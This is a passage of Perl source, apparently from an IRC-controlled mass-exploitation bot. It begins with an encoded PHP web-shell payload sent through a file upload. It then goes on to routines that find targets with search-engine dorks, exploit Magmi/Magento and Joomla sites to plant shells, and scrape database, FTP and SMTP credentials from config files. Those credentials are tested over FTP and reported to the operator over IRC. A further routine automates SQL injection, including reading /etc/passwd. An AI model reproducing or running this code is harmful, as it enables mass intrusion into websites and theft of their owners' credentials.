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')))); ?> ";
  3814.  
  3815. $header17 = 'Content-Disposition: form-data; name="upload-name"';
  3816.  
  3817. $header18 = 'bogel';
  3818.  
  3819. $header19 = 'Content-Disposition: form-data; name="action"';
  3820.  
  3821. $header20 = 'upload';
  3822.  
  3823. $header21 = "-----------------------------41184676334--";
  3824.  
  3825. $header22 = 'X-Request: JSON';
  3826.  
  3827. $header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8';
  3828.  
  3829. $header25 = 'json={"fn":"folderRename","args":["/bogel.gif","../../tmp/bogel.php.1"]}';
  3830.  
  3831. $header24 = "Content-Length: ".length($header25)."";
  3832.  
  3833. my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host" ,PeerPort=>"80") || return;
  3834.  
  3835. print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n";
  3836.  
  3837. my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host" ,PeerPort=>"80") || return;
  3838.  
  3839. print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n";
  3840.  
  3841. while ($hasil = <$remote>) {
  3842.  
  3843. if ($hasil =~ /200 OK/) {
  3844.  
  3845. $success = 1;
  3846.  
  3847. }
  3848.  
  3849. return $success;
  3850.  
  3851. }
  3852.  
  3853. }
  3854.  
  3855. ##
  3856.  
  3857. sub magmi_exploit() {
  3858.  
  3859.     my $chan = $_[0];
  3860.  
  3861.     my $bug = $_[1];
  3862.  
  3863.     my $dork = $_[2];
  3864.  
  3865.     my $engine = $_[3];
  3866.  
  3867.     my $nick = $_[4];
  3868.  
  3869.     my $count = 0;
  3870.  
  3871.     my @list = &search_engine($chan,$bug,$dork,$engine,$magslogo,$nick);
  3872.  
  3873.     my $num = scalar(@list);
  3874.  
  3875.     if ($num > 0) {
  3876.  
  3877.         foreach my $site (@list) {
  3878.  
  3879.             $count++;
  3880.  
  3881.             if ($count == $num-1) { &msg("$chan"," 14 I'm Done in 15,1[15@4$engine15]"); }
  3882.  
  3883.             my $test = "http://".$site.$bug;
  3884.  
  3885.             my $coba = "http://".$site."/app/etc/local.xml";
  3886.  
  3887.                 my $html = &get_content($test);
  3888.  
  3889.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  3890.  
  3891.                 if ($html =~ /MAGMI/ || $html =~ m/<h3>Upload New Plugins<\/h3>/i ) {
  3892.  
  3893.                 &msg("$chan","15,1[15@4$engine15]11 Executing Payloads...");
  3894.  
  3895.                 &magmi_xpl($test,$chan,$site,$engine,$nick);
  3896.  
  3897.                 &magmi_sql($test,$chan,$site,$engine,$nick);
  3898.  
  3899.                 #&ssh_connect($test,$host,$user,$pass,$chan,$engine,$nick);sleep(1);
  3900.  
  3901.                 #&bogex2($coba,$chan,$site,$engine,$nick);
  3902.  
  3903.                 } else { }
  3904.  
  3905.             } exit; sleep(2); }
  3906.  
  3907.         }
  3908.  
  3909.     }
  3910.  
  3911. }
  3912.  
  3913.  
  3914.  
  3915. sub magmi_xpl() {
  3916.  
  3917. #my $ua = LWP::UserAgent->new;
  3918.  
  3919. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0, SSL_version => 'TLSv1:!TLSv11:!TLSv12:!SSLv2:!SSLv3'});
  3920.  
  3921.    $ua->timeout(7);
  3922.  
  3923.    $ua->agent($uagent);
  3924.  
  3925. my $url    = $_[0];
  3926.  
  3927. my $chan   = $_[1];
  3928.  
  3929. my $site   = $_[2];
  3930.  
  3931. my $engine = $_[3];
  3932.  
  3933. my $nick   = $_[4];
  3934.  
  3935. my $action      = "http://".$site."magmi/web/magmi.php";
  3936.  
  3937. my $update_file = "revslider.zip";
  3938.  
  3939. my $exploit     = $ua->post("$url", Content_Type => "multipart/form-data", Content => [action => "$action", plugin_package => ["$update_file"]]);
  3940.  
  3941.     my $status  = $exploit->as_string;
  3942.  
  3943.     my $sukses  = "http://".$site."magmi/plugins/revslider/.libs.php";
  3944.  
  3945.     my $check = &get_content($sukses."?bajak");
  3946.  
  3947.     if ($check =~ /bogel - exploit/ || $check =~ /aanK - exploit/){
  3948.  
  3949.     my $safe = "";
  3950.  
  3951.     my $os   = "";
  3952.  
  3953.     my $uid  = "";
  3954.  
  3955.     if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  3956.  
  3957.     if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
  3958.  
  3959.     if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
  3960.  
  3961.     &msg("$chan","$magslogo(12@12$engine12)2(2@2SHeLL)12 $safe $os 2(2@2SixNergy Inc2) ");sleep(2);
  3962.  
  3963.     &msg("$admin","$magslogo [12@12$engine12]2[2@2SHeLL2]12 http://".$site."magmi/plugins/revslider/.libs.php Inc2");sleep(2);
  3964.  
  3965.     &msg("$nick","$magslogo [12@12$engine12]2[2@2SHeLL2]12 http://".$site."magmi/plugins/revslider/myluph.php Inc2");sleep(2);
  3966.  
  3967.     }
  3968.  
  3969. }
  3970.  
  3971.  
  3972.  
  3973. sub magmi_sql() {
  3974.  
  3975. my $url    = $_[0];
  3976.  
  3977. my $chan   = $_[1];
  3978.  
  3979. my $site   = $_[2];
  3980.  
  3981. my $engine = $_[3];
  3982.  
  3983. my $nick   = $_[4];
  3984.  
  3985. my $html   = &get_content($url);
  3986.  
  3987. my $test   = "http://".$site."/app/etc/local.xml";
  3988.  
  3989.             my $check = &get_content($test);
  3990.  
  3991.             if ($check =~ /<username><!\[CDATA\[(.*)\]\]\><\/username>/i) {
  3992.  
  3993.             my $serverIP = "";
  3994.  
  3995.             if ($check =~ /<host><!\[\CDATA\[(.*)\]\]\><\/host>/) {$serverIP=$1;}
  3996.  
  3997.             if ($check =~ /<username><!\[CDATA\[(.*)\]\]\><\/username>/){$user=$1;}
  3998.  
  3999.             if ($check =~ /<password><!\[CDATA\[(.*)\]\]\><\/password>/){$pass=$1;}
  4000.  
  4001.             if ($check =~ /<dbname><!\[CDATA\[(.*)\]\]\><\/dbname>/){$dbname=$1;}
  4002.  
  4003.             if ($check =~ /dbname/i) {
  4004.  
  4005.             &bogex2($test,$chan,$site,$engine,$nick);
  4006.  
  4007.             &msg("$chan","$magslogo15,1[4@15$engine15] Entot!7:9 http://".$site."[+]username:".$user."[+]password:".$pass."[+]dbname:".$dbname."");
  4008.  
  4009.                         #   &msg("$chan","$magslogo(12@2$engine12)12http://".$site." 2[+]username:12".$user."");
  4010.  
  4011.                           # &msg("$chan","$magslogo(12@2$engine12)12http://".$site." 2[+]password:12".$pass."");
  4012.  
  4013.                         #   &msg("$chan","$magslogo(12@2$engine12)12http://".$site." 2[+]dbname  :12".$dbname."");
  4014.  
  4015.                            if ($user =~ /_/) {
  4016.  
  4017.                            @users = split("_", $user); $usr = $users[0];}
  4018.  
  4019.                            my $ceklog = "ftp://".$usr.":".$pass."@".$site."";
  4020.  
  4021.                            my $ceklog2 = "ftp://".$user.":".$pass."@".$site."";
  4022.  
  4023.                            my $ftplog = &get_content($ceklog);
  4024.  
  4025.                            my $ftplog2 = &get_content($ceklog2);
  4026.  
  4027.                            if ($ftplog =~ /ftp/) {
  4028.  
  4029.                            &msg("$admin","9[+]$magslogo FTP[+] 11ftp://".$site." [+]username:".$usr." [+]password:".$pass."");
  4030.  
  4031.                           # &msg("$chan","9[+]$$mg2logo2$engine 12FTP[+]Success send To Admin");
  4032.  
  4033.                            }
  4034.  
  4035.                            if ($ftplog2 =~ /ftp/) {
  4036.  
  4037.                            &msg("$admin","9[+]$magslogo 11FTP[+] 11ftp://".$site." [+]username:".$user." [+]password:".$pass."");
  4038.  
  4039.                          #  &msg("$chan","9[+]$$mg2logo2$engine 12FTP[+]Success send To Admin");
  4040.  
  4041.                             }
  4042.  
  4043.                             my $hosts = "http://".$site;
  4044.  
  4045.                             if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
  4046.  
  4047.                                 $host = $2;
  4048.  
  4049.                                     #&dbi_connect($host,$user,$pass,$dbname,$chan,$engine,$mg2logo);sleep(1);
  4050.  
  4051.                                     &msg("$chan","!ftp ".$host." ".$user." ".$pass."");
  4052.  
  4053.                                         if ($dbname =~ /_/) {
  4054.  
  4055.                                         @users = split("_",$dbname); $dbuser = $users[0]; }
  4056.  
  4057.                                         &ftp_connect($url,$host,$dbuser,$pass,$chan,$engine,$magslogo);sleep(1);
  4058.  
  4059.                                         #&msg("$chan","!ftp ".$host." ".$dbuser." ".$pass."");
  4060.  
  4061.             }  
  4062.  
  4063.         }
  4064.  
  4065.     }
  4066.  
  4067. }
  4068.  
  4069.  
  4070.  
  4071. sub cckjseblod() {
  4072.  
  4073.     my $chan = $_[0];
  4074.  
  4075.     my $bug = $_[1];
  4076.  
  4077.     my $dork = $_[2];
  4078.  
  4079.     my $engine = $_[3];
  4080.  
  4081.     my $nick = $_[4];
  4082.  
  4083.     my $count = 0;
  4084.  
  4085.     my @list = &search_engine($chan,$bug,$dork,$engine,$cckjlogo,$nick);
  4086.  
  4087.     my $num = scalar(@list);
  4088.  
  4089.     if ($num > 0){
  4090.  
  4091.         foreach my $site(@list){
  4092.  
  4093.         $count++;
  4094.  
  4095.         if ($count == $num-1) { &msg("$chan","14I'm Done in 15$engine "); }
  4096.  
  4097.         my $target = "http://".$site.$bug;
  4098.  
  4099.         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  4100.  
  4101.         my $check = &get_content($target);
  4102.  
  4103.         if ($check =~ /class JConfig/) {
  4104.  
  4105.         my ($host,$user,$pass);
  4106.  
  4107.         $target =~ s/http:\/\///;
  4108.  
  4109.         $target =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  4110.  
  4111.         if ($check =~ m/\$ftp_host = '(.+?)';/i){$host=$1;}
  4112.  
  4113.         if ($check =~ m/\$ftp_user = '(.+?)';/i){$user=$1;}
  4114.  
  4115.         if ($check =~ m/\$ftp_pass = '(.+?)';/i){$pass=$1;}
  4116.  
  4117.         if ($check =~ m/\$smtphost = '(.+?)';/i){$smtphost=$1;}
  4118.  
  4119.         if ($check =~ m/\$smtpport = '(.+?)';/i){$smtpport=$1;}
  4120.  
  4121.         if ($check =~ m/\$smtpuser = '(.+?)';/i){$smtpuser=$1;}
  4122.  
  4123.         if ($check =~ m/\$smtppass = '(.+?)';/i){$smtppass=$1;}
  4124.  
  4125.         if ($check =~ m/\$password = '(.+?)';/i){$password=$1;}
  4126.  
  4127.         if ($host =~ /127.0.0.1/) { $host = $target}
  4128.  
  4129.         &msg("$chan","$cckjlogo15,1[15@4$engine15]4 Host:3 $host 4| 4User:3 $user 4| 4Pass:3 $pass 15][ 4SmtpHost:8 $smtphost 4| 4SmtpPort:8 $smtpport 4| 4SmtpUser:8 $smtpuser 4| 4SmtpPass:8 $smtppass | 4Cadangan:15 $password ");
  4130.  
  4131.         if ($user =~ /_/) { my @userz = split("_", $user); $user = $userz[0];}
  4132.  
  4133.         my $success = 1;
  4134.  
  4135.         use Net::FTP;
  4136.  
  4137.         eval {
  4138.  
  4139.         my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 6);
  4140.  
  4141.         $success = 0 if $ftp->login($user,$pass);
  4142.  
  4143.         $ftp->quit;
  4144.  
  4145.         };
  4146.  
  4147.         if ($success == 0) {
  4148.  
  4149.             &msg("$chanx","$cckjlogo15,1[15@4$engine15]14 FTP4 3ftp://".$host." 4| 4User:3 $user 4| 4Pass:3 $pass 15]9 FVCKED!");
  4150.  
  4151.             &msg("$nick","$cckjlogo15,1[15@4$engine15]14 FTP4 3ftp://".$host." 4| 4User:3 $user 4| 4Pass:3 $pass 15]9 FVCKED!");
  4152.  
  4153.             #&msg("$chan","$cckjlogo15,1[15@4$engine15][8 Status Login cPanel 9OK! 15-8 Result Sent to 9ADMIN 15] ");
  4154.  
  4155.         }
  4156.  
  4157.          else {
  4158.  
  4159.             #&msg("$chan","15,1 [9FTP15] [ 9ftp://".$host." 15] [".$user." : ".$pass."15] 4Denied ");
  4160.  
  4161.          }
  4162.  
  4163.         }
  4164.  
  4165.     } exit;
  4166.  
  4167. }
  4168.  
  4169.         }
  4170.  
  4171.     }
  4172.  
  4173. }
  4174.  
  4175.    
  4176.  
  4177. sub sql_exploit() {
  4178.  
  4179.     my $chan = $_[0];
  4180.  
  4181.     my $bug = $_[1];
  4182.  
  4183.     my $dork = $_[2];
  4184.  
  4185.     my $engine = $_[3];
  4186.  
  4187.     my $nick = $_[4];
  4188.  
  4189.     my $count = 0;
  4190.  
  4191.     my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo,$nick);
  4192.  
  4193.     my $num = scalar(@list);
  4194.  
  4195.     if ($num > 0) {
  4196.  
  4197.         foreach my $site (@list) {
  4198.  
  4199.             $count++;
  4200.  
  4201.             if ($count == $num-1) { &msg("$chan","14I'm Done in 15$engine "); }
  4202.  
  4203.             my $test = "http://".$site.$bug."'";
  4204.  
  4205.             my $vuln = "http://".$site."4".$bug;
  4206.  
  4207.             my $sqlsite = "http://".$site.$bug;
  4208.  
  4209.             my $html = &get_content($test);
  4210.  
  4211.             if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  4212.  
  4213.             if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
  4214.  
  4215.                 &sqlbrute($sqlsite,$chan,$engine,$nick);}
  4216.  
  4217.             elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
  4218.  
  4219.                 &msg("$chan","$sqllogo 15,1 $engine 15(4@9MsSQL15) 14 ".$vuln);}
  4220.  
  4221.             elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
  4222.  
  4223.                 &msg("$chan","$sqllogo 15,1 $engine 15(4@9MsAccess15) 14 ".$vuln);}
  4224.  
  4225.             elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
  4226.  
  4227.                 &sqlbrute($sqlsite,$chan,$engine,$nick);}
  4228.  
  4229.             } exit; sleep(2); }
  4230.  
  4231.         }
  4232.  
  4233.     }
  4234.  
  4235. }
  4236.  
  4237. sub sqlbrute() {
  4238.  
  4239.     my $situs=$_[0];
  4240.  
  4241.     my $chan  =$_[1];
  4242.  
  4243.     my $engine=$_[2];
  4244.  
  4245.     my $nick = $_[3];
  4246.  
  4247.     my $columns=20;
  4248.  
  4249.     my $cfin.="--";
  4250.  
  4251.     my $cmn.= "+";
  4252.  
  4253.     for ($column = 0 ; $column < $columns ; $column ++)
  4254.  
  4255.     {
  4256.  
  4257.     $union.=','.$column;
  4258.  
  4259.     $inyection.=','."0x6c6f67696e70776e7a";
  4260.  
  4261.     if ($column == 0)
  4262.  
  4263.       {
  4264.  
  4265.           $inyection = '';
  4266.  
  4267.           $union = '';
  4268.  
  4269.       }
  4270.  
  4271.     $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
  4272.  
  4273.     $response=get($sql);
  4274.  
  4275.     if($response =~ /loginpwnz/)
  4276.  
  4277.         {
  4278.  
  4279.          $column ++;
  4280.  
  4281.          $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
  4282.  
  4283.          &msg("$chan","$sqllogo 15,1 $engine 15(4@9SQL15) 14 $sql ");
  4284.  
  4285.          $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
  4286.  
  4287.          $response=get($sql)or die("[-] Impossible to get Information_Schema\n");
  4288.  
  4289.          if($response =~ /loginpwnz/)
  4290.  
  4291.             {
  4292.  
  4293.          $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
  4294.  
  4295.             &msg("$chan","$sqllogo 15,1 $engine 15(4@9SQL15)(4@13INFO_SCHEMA15) 14 $sql ");
  4296.  
  4297.             }
  4298.  
  4299.          $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
  4300.  
  4301.          $response=get($sql)or die("[-] Impossible to get MySQL.User\n");
  4302.  
  4303.          if($response =~ /loginpwnz/)
  4304.  
  4305.             {
  4306.  
  4307.          $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
  4308.  
  4309.             &msg("$chan","$sqllogo 15,1 $engine 15(4@9SQL15)(4@9USER15) 14 $sql ");
  4310.  
  4311.             }
  4312.  
  4313.          else
  4314.  
  4315.             {
  4316.  
  4317.             }
  4318.  
  4319.     while ($loadcont < $column-1)
  4320.  
  4321.        {
  4322.  
  4323.         $loadfile.=','.'load_file(0x2f6574632f706173737764)';
  4324.  
  4325.         $loadcont++;
  4326.  
  4327.        }
  4328.  
  4329.        $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
  4330.  
  4331.     $response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
  4332.  
  4333.          if($response =~ /root:x:/)
  4334.  
  4335.             {
  4336.  
  4337.             &msg("$chan","$sqllogo 15,1 $engine 15(4@9SQL15)(4@9Load File15) 14 $sql ");
  4338.  
  4339.             }
  4340.  
  4341.          else
  4342.  
  4343.             {
  4344.  
  4345.             }
  4346.  
  4347.               foreach $tabla(@tabele)
  4348.  
  4349.                 {
  4350.  
  4351.                   chomp($tabla);
  4352.  
  4353.                   $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
  4354.  
  4355.                  $response=get($sql)or die("[-] Impossible to get tables\n");
  4356.  
  4357.                   if($response =~ /loginpwnz/)
  4358.  
  4359.                     {
  4360.  
  4361.                     $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
  4362.  
